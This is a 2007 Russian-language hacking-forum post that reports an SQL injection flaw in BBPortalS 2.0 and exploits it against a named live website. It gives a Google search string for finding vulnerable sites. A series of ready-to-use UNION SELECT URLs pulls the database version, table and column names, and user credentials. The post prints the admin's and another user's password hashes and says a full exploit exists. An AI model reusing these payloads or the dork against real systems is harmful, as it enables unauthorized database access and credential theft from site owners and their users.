ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 22.10.2007, 15:00
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Уязвимость в BBPortalS <=2.0
Цитата:
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных сценарием tnews.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Поиск в гугл: inurl:"tnews.php?op"
Пример:
_www.actupix.net
Скуль:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(version(),0x3a,user(),0x3a,database()),7,8,9,10,11,12/*
Смотрим названия таблиц, меняя параметр limit:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.tables+limit+0,1/*
CHARACTER_SETS
COLLATIONS
----------
zypibot
85 таблиц.
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12+from+information_schema.tables+limit+84,1/*
Колонки:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,column_name,7,8,9,10,11,12+from+information_schema.columns+limit+0,1/*
Таблица users:
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users/*
Админ (меняем limit и смотрим других юзеров):
Код:
_http://www.actupix.net/tnews.php?op=tnews&id=-1+union+select+1,2,3,4,5,concat(login,0x3a,pass),7,8,9,10,11,12+from+users+limit+1,1/*
Admin:418685582e6f6e65516b90feaeab6518
Patrice:418685582e6f6e65516b90feaeab6518

PS Есть эксплоит

Последний раз редактировалось -=lebed=-; 22.10.2007 в 15:15..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ